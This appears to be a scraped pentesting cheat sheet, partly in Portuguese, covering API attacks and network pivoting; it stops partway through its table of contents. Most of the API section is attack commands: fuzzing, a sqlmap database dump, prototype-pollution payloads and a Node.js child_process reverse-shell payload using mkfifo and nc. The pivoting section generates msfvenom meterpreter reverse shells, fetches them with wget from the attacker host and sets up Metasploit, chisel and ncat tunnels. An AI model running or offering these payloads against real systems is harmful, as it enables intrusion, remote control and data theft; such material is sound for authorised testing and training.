# Table of Contents - [API Pentesting | Pentesting](#api-pentesting-pentesting) - [Pivoting techniques | Pentesting](#pivoting-techniques-pentesting) - [Basic LDAP Injection | Pentesting](#basic-ldap-injection-pentesting) - [Aquatone | Pentesting](#aquatone-pentesting) - [NOSQL injections | Pentesting](#nosql-injections-pentesting) - [Basic authentication bypass | Pentesting](#basic-authentication-bypass-pentesting) - [SSTI | Pentesting](#ssti-pentesting) - [SERVER SIDE REQUEST FORGERY (SSRF) | Pentesting](#server-side-request-forgery-ssrf-pentesting) - [GENERAL INFORMATION | Pentesting](#general-information-pentesting) - [Easy - No Protections | Pentesting](#easy-no-protections-pentesting) - [SQL injections | Pentesting](#sql-injections-pentesting) - [Cracking files | Pentesting](#cracking-files-pentesting) - [Wordlists & co. | Pentesting](#wordlists-co-pentesting) - [XML External Entity (XXE) Injection Payloads | Pentesting](#xml-external-entity-xxe-injection-payloads-pentesting) - [John The Ripper Cheatsheet | Pentesting](#john-the-ripper-cheatsheet-pentesting) - [Hashcat Cheatsheet | Pentesting](#hashcat-cheatsheet-pentesting) - [Post exploitation techniques | Pentesting](#post-exploitation-techniques-pentesting) - [WinRM (Windows Remote Management) Pentesting | Pentesting](#winrm-windows-remote-management-pentesting-pentesting) - [Command find priv /esc | Pentesting](#command-find-priv-esc-pentesting) - [Crawl/Fuzz | Pentesting](#crawl-fuzz-pentesting) - [API Recon | Pentesting](#api-recon-pentesting) - [Shells & Payloads | Pentesting](#shells-payloads-pentesting) - [API windows | Pentesting](#api-windows-pentesting) - [API Token Attacks | Pentesting](#api-token-attacks-pentesting) - [HTTP Request Smuggling | Pentesting](#http-request-smuggling-pentesting) - [Pivoting, Tunneling, and Port Forwarding | Pentesting](#pivoting-tunneling-and-port-forwarding-pentesting) - [Api keys | Pentesting](#api-keys-pentesting) --- # API Pentesting | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252Fz4hhNRD5uTWLfviuIG2Y%252F20.jpg%3Falt%3Dmedia%26token%3D094dfd16-6207-466f-8a81-3f2507f690d3&width=1248&dpr=3&quality=100&sign=59461e28&sv=2) **Change Methods** # Methods GET, POST, PUT, DELETE, OPTIONS, HEAD, PATCH, INVENTED **Endpoint Discovery** Tente enumerar endpoints enquanto altera metodos HTTP como GET, POST, OPTIONS, etc. /api/?xml /api?xml /api/v1?xml /api/v1/user?xml \# Web Service Description Language /api/?wsdl \# Versions /api/v1/user /api/v2/user /api/v3/user \# Wildcards /api/v2/user/\* /api/v2/user/posts/\* /api/v2/users/\* \# Path traversal /api/v1/post/..\\private **Automation** **\# Dirb** dirb https://vulnerable.com/ endpoints.txt **\# Ffuf** ffuf -u https://vulnerable.com/FUZZ -w endpoints.txt ffuf -u https://vulnerable.com/FUZZ -X POST -w endpoints.txt ffuf -u https://vulnerable.com/api/FUZZ -w wordlist.txt ffuf -u https://example.com/api/?FUZZ=test -w wordlist.txt **\# Gobuster** gobuster dir -u https://vulnerable.com/ -w endpoints.txt [https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743darrow-up-right](https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d) **\# Kiterunner** # -A: wordlist type (ex. first 20000 words) # -x: max connection per host (default: 3) kr scan https://vulnerable.com/api -A=apiroutes-210228:20000 -x 10 kr scan https://vulnerable.com/api -A=apiroutes-210228:20000 -x 10 --fail-status-codes 401,404 kr scan https://vulnerable.com:8443/api -A=apiroutes-210228:20000 -x 10 **GET Parameters** /api/v1/user?id=test /api/v1/user?name=test /api/v1/user?uuid=test /api/v1/status?live=test /api/v1/status?verbose=test **Parameter Fuzzing** # Key ffuf -u [https://vulnerable.com/api/items?FUZZ=testarrow-up-right](https://vulnerable.com/api/items?FUZZ=test) -w wordlist.txt ffuf -u [https://vulnerable.com/api/items?FUZZ=testarrow-up-right](https://vulnerable.com/api/items?FUZZ=test) -w wordlist.txt -fs 120 ffuf -X POST -u [https://vulnerable.com/api/items?FUZZ=testarrow-up-right](https://vulnerable.com/api/items?FUZZ=test) -w wordlist.txt ffuf -X POST -u [https://vulnerable.com/api/items?FUZZ=testarrow-up-right](https://vulnerable.com/api/items?FUZZ=test) -w wordlist.txt -fs 120 # Value ffuf -u [https://vulenrable.com/api/items?test=FUZZarrow-up-right](https://vulenrable.com/api/items?test=FUZZ) -w wordlist.xt ffuf -u [https://vulnerable.com/api/items?test=FUZZarrow-up-right](https://vulnerable.com/api/items?test=FUZZ) -w wordlist.txt -fs 120 ffuf -X POST -u [https://vulnerable.com/api/items?test=FUZZarrow-up-right](https://vulnerable.com/api/items?test=FUZZ) -w wordlist.txt ffuf -X POST -u [https://vulnerable.com/api/items?test=FUZZarrow-up-right](https://vulnerable.com/api/items?test=FUZZ) -w wordlist.txt -fs 120 **S****ending Unexpected Data** Podemos encontrar qualquer coisa enviando dados inesperados no metodo POST ou PUT. {"email": "test@test.com"} {"email": true} {"email": 1} {"email": -1} {"email": \["test@test.com", true\]} {"email": {"admin": true}} // Prototype Pollution {"email": "test@test.com", "\_\_proto\_\_": {"admin": true}} {"email": {"\_\_proto\_\_": {"admin": true}}} **XSS** Se pudermos enviar solicitações post (ou colocar) para endpoints da API, poderemos inserir cargas úteis e o resultado será refletido como a saída. XSS pode ser usado para esta exploração. **SQL Injection** sqlmap -u [http://vulnerable.com/api/v2/fetch/?post=1arrow-up-right](http://vulnerable.com/api/v2/fetch/?post=1) --dump --batch **Node.js Remote Code Execution (RCE)** Se o site usar o Node (por exemplo, Express), poderemos executar a função JavaScript.Se o site usar o Node (por exemplo, Express), poderemos executar a função JavaScript.Se o site usar o Node (por exemplo, Express), poderemos executar a função JavaScript. # Get current working directory in the website /api/?key=process.cwd() **Reverse Shell** Podemos executar o shell reverso usando "child\_process". Primeiro, inicie o ouvinte para obter um shell na máquina local. nc -lvnp 4444 Em seguida, envie a solicitação para o site com o parâmetro que executa o shell reverso usando child\_process. /api/?key=require('child\_process').exec('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f') **Same Session Across Multiple Versions and Instances** For example, assumed the website has two endpoints such as "/api/v1/user/login", "/api/v2/user/login". "v1" uses "X-Token" and "v2" uses "X-Session". After login to "v1", you may be able to get access "v2" using the session key/value of "v1". X-Token: fc38ab5f5ae41072778d852023f9ee26 X-Session: fc38ab5f5ae41072778d852023f9ee26 **XEE** GET /api/product/1?xml HTTP/1.1 Se o site exibir a resposta em XML, poderemos fazer XXE. 𝗔𝗣𝗜 𝗚𝗮𝘁𝗲𝘄𝗮𝘆 - 𝘀𝗲𝗰𝘂𝗿𝗶𝘁𝘆 Discutiremos algumas das implicações interessantes de segurança no API Gateway. [https://divyanshu-mehta.gitbook.io/researchs/aws-cloud-security/hacking-api-gatewayarrow-up-right](https://divyanshu-mehta.gitbook.io/researchs/aws-cloud-security/hacking-api-gateway) Desvio de restrição IP Vários gateways de API podem ser usados para ignorar a restrição de IP. Isso pode ser feito roteando solicitações via API Gateway aleatoriamente, que podem ignorar facilmente o bloqueio de IP e outras restrições baseadas em IP. Nesse caso, o usuário procuraria sua solicitação por meio do API Gateway escolhido aleatoriamente, que ajuda a mascarar seu IP e, posteriormente, envia a solicitação ao servidor com o IP mascarado. #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/#atacando-gateways-publicos-nao-autenticados) Atacando gateways públicos não autenticados A autenticação no gateway de API pública não ocorre por padrão. Portanto, é completamente possível acionar o destino do API Gateway da Internet se o Gateway não estiver protegido. Cenário: a enumeração inicial descobriu uma função lambda que executa um conjunto especial de instruções com base na entrada do usuário e é acionada pelo API Gateway. Também descobrimos que o API Gateway não é autenticado e é público na Internet. Exemplo: Abaixo está o código da função lambda: - def lambda\_handler(event,context): ...... argument = event\['rawQueryString'\] if argument == "this\_is\_normal": printf("This is lambda") elif argument == "this\_is\_changed": printf("Flag: {secuirtylabs\_api\_gateways}") Nossa enumeração inicial também descobriu o ponto final da API anexado ao lambda. Verificou-se que o ponto final da API era **https://test123.execute-api.ap-south-1.amazonaws.com/** Portanto, no caso acima, podemos manipular o campo de argumento e enviar uma solicitação de curvatura para o endpoint de destino. Solicitação: curl -X GET [https://test123.execute-api.ap-south-1.amazonaws.com/?argument=this\_is\_changedarrow-up-right](https://test123.execute-api.ap-south-1.amazonaws.com/?argument=this_is_changed) [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/#chamadas-api-gateway) Chamadas API Gateway -------------------------------------------------------------------------------------------------------- Aqui estão algumas chamadas populares da API Gateway e o que elas fazem: • **get-integrations**: Chamada da API para imprimir todas as integrações associadas ao api-id • **get-routes**: Chamada da API para imprimir todas as rotas associadas ao api-id • **get-stages**: Chamada da API para imprimir todas as etapas associadas ao api-id [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/#s3-secutity) **S3 Secutity** ------------------------------------------------------------------------------------------ A seguir, alguns cenários de segurança interessantes: [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/#cenario-i-meu-s3-esta-aberto) Cenário I - Meu S3 está aberto -------------------------------------------------------------------------------------------------------------------------- Muitas vezes, o balde S3 é aberto ao mundo e permite acesso não autorizado de leitura e gravação. Esse foi o principal motivo da violação do CapitalOne. Para listar objetos em um balde S3 chamado "bucket de teste", basta visitar **https://test-bucket.s3.amazonaws.com** ou execute a seguinte chamada de API. aws s3 ls s3://test-bucket [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/#senario-ii-s3-ransomware) Senario II - S3 Ransomware ------------------------------------------------------------------------------------------------------------------ Compartilhamos uma pesquisa feita pela equipe RhinoSecurity, que é equivalente da nuvem para o Ransomware no S3. O balde S3 com acesso de gravação pode ser criptografado com uma chave KMS que pertence à conta do invasor. Nesse caso, o proprietário do balde não poderá descriptografar o conteúdo, pois a chave criptografada não pertence à sua conta. Depois que o balde for criptografado, o invasor poderá deixar ransom.txt como uma nota de resgate e resgatar o balde. Mais detalhes sobre esta pesquisa interessante podem ser encontrados [aquiarrow-up-right](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/) [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/#cenario-iii-politica-de-buckets-aberta) **Cenário III - Política de buckets aberta** -------------------------------------------------------------------------------------------------------------------------------------------------- Muitas vezes, os usuários garantem que não tornem público o balde, mas uma política de balde mal configurada torna um balde público indiretamente. Por exemplo, considere a política abaixo: { "Version": "2012-10-17", "Statement": \[ { "Sid": "Statement2", "Effect": "Allow", "Principal": "\*", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::securitylabs-articles/\*" } \] } Esta política é uma política S3 vulnerável que indica que qualquer pessoa na Internet pode baixar objetos do meu balde **securitylabs-articles** . Aqui a parte vulnerável é o campo Principal que é `*` o que indica que qualquer pessoa na internet pode baixar objetos. Supondo que exista um objeto chamado **note.txt** para baixar o objeto, basta fazer a solicitação de curvatura abaixo [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/#undefined) ----------------------------------------------------------------------- [NextPivoting techniqueschevron-right](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques) Last updated 2 years ago * [Chamadas API Gateway](https://morgan-bin-bash.gitbook.io/pentesting/#chamadas-api-gateway) * [S3 Secutity](https://morgan-bin-bash.gitbook.io/pentesting/#s3-secutity) * [Cenário I - Meu S3 está aberto](https://morgan-bin-bash.gitbook.io/pentesting/#cenario-i-meu-s3-esta-aberto) * [Senario II - S3 Ransomware](https://morgan-bin-bash.gitbook.io/pentesting/#senario-ii-s3-ransomware) * [Cenário III - Política de buckets aberta](https://morgan-bin-bash.gitbook.io/pentesting/#cenario-iii-politica-de-buckets-aberta) * [](https://morgan-bin-bash.gitbook.io/pentesting/#undefined) --- # Pivoting techniques | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252F1GV2Z2956jYLPnmx2p4h%252Foioi.png%3Falt%3Dmedia%26token%3D24edf9da-3a66-47cd-adc6-d74a649f7449&width=1248&dpr=3&quality=100&sign=9b973ae&sv=2) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#proxychains-pivot) **Proxychains Pivot** When you have access to a machine, you can use it as pivot to target machines [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#getting-known-machines) Getting known machines ------------------------------------------------------------------------------------------------------------------------------- arp -a [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#setup-ssh-dynamic-on-the-attacking-box) Setup SSH Dynamic on the attacking box --------------------------------------------------------------------------------------------------------------------------------------------------------------- ssh -D @ [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#setup-proxychains-in-etc-proxychains.conf) Setup proxychains in /etc/proxychains.conf ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- \[ProxyList\] socks4 127.0.0.1 [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#reduce-timeout-in-etc-proxychains.conf-to-gain-speed) Reduce timeout in /etc/proxychains.conf to gain speed -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- tcp\_read\_time\_out 800 tcp\_connect\_time-out 800 [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#then) Then ------------------------------------------------------------------------------------------- proxychains... [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#scanning-nmap-can-be-very-long-through-proxychains) Scanning (nmap) can be very long through proxychains ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#you-can-speed-it-up-by-using-xargs-and-multithreading) You can speed it up by using xargs and multithreading --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#the-main-goal-is-to-spread-ports-between-different-threads-p-50) The main goal is to spread ports between different threads (-P 50) -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- $ seq 1 65535 | xargs -P 50 -I port proxychains -q nmap -p port -sT -T4 10.42.42.2 -oG 10.42.42.2 --open --append-output 10.42.42.2 -Pn -n [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#take-care-of-some-options) Take care of some options ------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#you-cant-just-run-oa-but-need-the-append-output-option) You can't just run -oA but need the --append-output option --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#the-same-behavior-can-be-used-to-scan-multiple-machines) The same behavior can be used to scan multiple machines ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#the-base-command) The base command ------------------------------------------------------------------------------------------------------------------- $ proxychains nmap -p- -sT -T4 --top-ports 20 10.42.42.0/24 -oG 10.42.42.0 --open [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#become) Become ----------------------------------------------------------------------------------------------- $ seq 1 254 | xargs -P 50 -I cpt proxychains -q nmap --top-ports 20 -sT -T4 10.42.42.cpt -oG 10.42.42.0 --open --append-output 10.42.42.cpt -Pn -n Double Pivot Proxychains [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#pivot-1-using-proxychains) Pivot 1 using proxychains ------------------------------------------------------------------------------------------------------------------------------------- ssh -D 1080 user@IP\_Network1 [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#configure-etc-proxychains-to-set-port-1080) Configure /etc/proxychains to set port 1080 ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#pivot-2-using-proxychains) Pivot 2 using proxychains ------------------------------------------------------------------------------------------------------------------------------------- proxychains ssh -D 1081 user@IP\_Network2 [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#configure-etc-proxychains-to-set-port-1081) Configure /etc/proxychains to set port 1081 ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ **proxychains nmap...** **Port Forwarding** [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#windows) Windows ------------------------------------------------------------------------------------------------- plink.exe -l root -R 445:127.0.0.1:445 YOURIPADDRESS [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#metasploit) Metasploit ------------------------------------------------------------------------------------------------------- portfwd add -l 9090 -p 9090 -r TARGETIP [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#reverse-ssh-tunnel-port-forwarding-8090-from-target-to-us) Reverse ssh tunnel, port forwarding 8090 from target to us: ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ssh -R 8090:localhost:8090 user@ip [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#local-port-forward-forward-local-8090-to-target) Local port forward, forward local 8090 to target: ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ssh -L 8090:localhost:8090 user@ip **SSH Pivoting** [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#local-port-forwarding) Local port forwarding ----------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#local-port-opened-on-127.0.0.1-bind) Local port opened on 127.0.0.1 (bind) ----------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#n-no-command-executed-only-ssh-tunnel) \-N == no command executed (only ssh tunnel) -------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#usd-ssh-user-pivoting_machine-l-bind_address-local_port-destination_host-destination_hostport-n) **$ ssh user@pivoting\_machine -L \[bind\_address:\]local\_port:destination\_host:destination\_hostport -N** ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- sshuttle [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#transparent-proxy-over-ssh) Transparent proxy over SSH --------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#forwarding-traffic-through-the-pivot) Forwarding traffic through the pivot ----------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#it-will-then-auto-create-necessary-iptables-rules) It will then auto create necessary iptables rules ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- sshuttle -r user@pivoting\_machine x.x.x.x/24 [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#you-can-also-let-sshuttle-detect-networks-based-on-the-target) You can also let sshuttle detect networks based on the target ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#x-exclude-some-network-to-not-transmit-over-the-tunnel) \-x == exclude some network to not transmit over the tunnel ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- sshuttle -vNr user@pivoting\_machine -x x.x.x.x.x/24 Metasploit pivoting [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#reverse-shell-generation) Reverse Shell generation ----------------------------------------------------------------------------------------------------------------------------------- $ msfvenom -p linux/x64/meterpreter/reverse\_tcp LHOST=192.168.2.149 LPORT=8080 -f elf --platform linux --arch x64 > reverse.elf $ python -m http.server --bind 192.168.2.149 $ wget http://192.168.2.149:8000/reverse.elf $ chmod u+x reverse.elf [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#setup-listener) Setup listener --------------------------------------------------------------------------------------------------------------- $ msfconsole -q msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse\_tcp msf5 exploit(multi/handler) > run [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#autoroute-module) Autoroute module ------------------------------------------------------------------------------------------------------------------- msf5 > use post/multi/manage/autoroute msf5 post(multi/manage/autoroute) > set SESSION 1 msf5 post(multi/manage/autoroute) > set CMD add msf5 post(multi/manage/autoroute) > set SUBNET 10.42.42.0 msf5 post(multi/manage/autoroute) > set NETMASK /24 msf5 post(multi/manage/autoroute) > set CMD print msf5 post(multi/manage/autoroute) > run [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#on-windows-you-can-use-post-windows-gather-arp_scanner-to-discover-other-machines) On windows you can use post/windows/gather/arp\_scanner to discover other machines ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#on-linux-you-can-try-arp-a) On Linux you can try arp -a ---------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#socks-proxy-setup) SOCKS proxy setup --------------------------------------------------------------------------------------------------------------------- msf5 > use auxiliary/server/socks4a msf5 auxiliary(server/socks4a) > set SRVPORT 1081 msf5 auxiliary(server/socks4a) > run [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#now-equivalent-to-a-dynamic-ssh) Now, equivalent to a dynamic SSH -------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#double-pivoting) Double Pivoting ----------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#reverse-shell-from-the-pwned2-to-the-pwned1) Reverse shell from the pwned2 to the pwned1 ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- $ msfvenom -p windows/x64/meterpreter/reverse\_tcp LHOST=10.42.42.1 LPORT=8088 -f exe --platform windows --arch x64 > reverse.exe [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#setup-handler-and-exploit-the-found-vulnerability) Setup handler and exploit the found vulnerability ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- **Ncat pivoting** [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#ncat-netcat) Ncat =/= netcat ------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#enhanced-version-developped-by-nmap-dev-and-often-packaged-with) Enhanced version, developped by nmap dev and often packaged with ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#ciphered-connexion-ip-restriction) Ciphered connexion, IP restriction ------------------------------------------------------------------------------------------------------------------------------------------------------ [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#to-pivot-needed-on-both-attacker-and-pivot-machine) To pivot, needed on both attacker and pivot machine ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#attacker-broker-accept-multiple-connexions) Attacker (broker == accept multiple connexions) ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- $ ncat -lv --broker --max-conns 2 [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#pivot) Pivot --------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#we-connect-to-attacker-and-target) We connect to attacker and target ----------------------------------------------------------------------------------------------------------------------------------------------------- $ ncat -v 192.168.2.149 31337 -c 'ncat -v 10.42.42.2 80' Chisel Pivoting (HTTP Tunnel) [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#chisel-offers-to-encapsulate-tcp-connexions-in-http-tunnels) Chisel offers to encapsulate TCP connexions in HTTP tunnels --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#everything-is-encrypted-using-ssh) Everything is encrypted using SSH ----------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#local-port-forwarding-1) Local port forwarding ------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#pivot-machine) Pivot machine ------------------------------------------------------------------------------------------------------------- $ chisel server -p 8080 --host 192.168.2.105 -v [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#attacker-machine) Attacker machine ------------------------------------------------------------------------------------------------------------------- $ chisel client -v http://192.168.2.105:8080 127.0.0.1:33333:10.42.42.2:80 [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#local-port-forwarding--socks-proxy) Local port forwarding + SOCKS proxy -------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#pivot-machine-1) Pivot machine --------------------------------------------------------------------------------------------------------------- $ chisel server -p 8080 --host 192.168.2.105 --socks5 -v [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#attacker-machine-1) Attacker machine --------------------------------------------------------------------------------------------------------------------- $ chisel client -v http://192.168.2.105:8080 127.0.0.1:33333:socks [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#reverse-remote-port-forwarding) Reverse remote port forwarding ----------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#attacker-machine-2) Attacker machine --------------------------------------------------------------------------------------------------------------------- $ chisel server -p 8888 --host 192.168.2.149 --reverse -v [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#pivot-machine-2) Pivot machine --------------------------------------------------------------------------------------------------------------- $ chisel client -v http://192.168.2.149:8888 R:127.0.0.1:44444:10.42.42.2:80 **PivotSuite** [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#similar-features-to-other-tools-but-support-multilevel-pivot) Similar features to other tools but support multilevel pivot ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#like-metasploit) Like Metasploit ----------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#remote-local-port-forwarding) "Remote" local port forwarding --------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#on-the-pivot) On the pivot ----------------------------------------------------------------------------------------------------------- $ pivotsuite -S -F --server-option=PF --forward-ip=10.42.42.2 --forward-port=80 --server-ip=192.168.2.105 --server-port=8080 [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#remote-dynamic-port-forwarding) "Remote" dynamic port forwarding ------------------------------------------------------------------------------------------------------------------------------------------------- $ pivotsuite -S -F --server-option=SP --server-ip=192.168.2.105 --server-port=8080 Tunna / Fulcrom (HTTP) [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#everything-is-through-http) Everything is through HTTP --------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#bypass-some-ips-ids) Bypass some IPS/IDS ------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#first-step-is-to-deploy-webshell-on-the-target) First step is to deploy webshell on the target ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#some-are-available-with-the-tool-but-not-good) Some are available with the tool (but not good) ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#can-be-hard-to-use) Can be hard to use ----------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#then-on-the-attacker-machine) Then on the attacker machine ------------------------------------------------------------------------------------------------------------------------------------------- $ python2 proxy.py -u http://192.168.2.105:8080/conn.php -l 7777 -r 80 -a 10.42.42.2 -v [PreviousAPI Pentestingchevron-left](https://morgan-bin-bash.gitbook.io/pentesting) [NextAquatonechevron-right](https://morgan-bin-bash.gitbook.io/pentesting/aquatone) Last updated 2 years ago * [Proxychains Pivot](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#proxychains-pivot) * [Getting known machines](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#getting-known-machines) * [Setup SSH Dynamic on the attacking box](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#setup-ssh-dynamic-on-the-attacking-box) * [Setup proxychains in /etc/proxychains.conf](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#setup-proxychains-in-etc-proxychains.conf) * [Reduce timeout in /etc/proxychains.conf to gain speed](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#reduce-timeout-in-etc-proxychains.conf-to-gain-speed) * [Then](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-techniques#then) * [Scanning (nmap) can be very long through 